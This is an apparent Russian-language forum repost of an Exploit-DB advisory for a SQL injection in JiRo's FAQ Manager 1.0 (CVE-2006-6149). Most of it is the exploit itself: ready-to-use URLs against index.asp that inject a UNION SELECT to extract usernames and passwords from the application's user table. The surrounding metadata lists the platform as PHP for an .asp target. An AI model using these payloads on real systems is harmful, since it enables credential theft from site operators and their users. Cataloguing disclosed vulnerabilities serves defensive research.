Exploit JiRos FAQ Manager 1.0 - 'index.asp' SQL Injection

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
2836
Проверка EDB
  1. Пройдено
Автор
AJANN
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2006-6149
Дата публикации
2006-11-23
Код:
*******************************************************************************
# Title   :  JiRo´s FAQ Manager v1.0 (index.asp) Remote SQL Injection Vulnerability
# Author  :   ajann
# Contact :   :(

*******************************************************************************

###http://[target]/[path]//index.asp?tID=[SQL]

Example:

//index.asp?tID=-1%20union%20select%200,uPassword,0,0,0,0,0,0,0,0,0,0,0,0%20from%20JFS_tblusers%20where%20no%20like%200
//index.asp?tID=-1%20union%20select%200,uName,0,0,0,0,0,0,0,0,0,0,0,0%20from%20JFS_tblusers%20where%20no%20like%200


"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!

# milw0rm.com [2006-11-23]
 
Источник
www.exploit-db.com

Похожие темы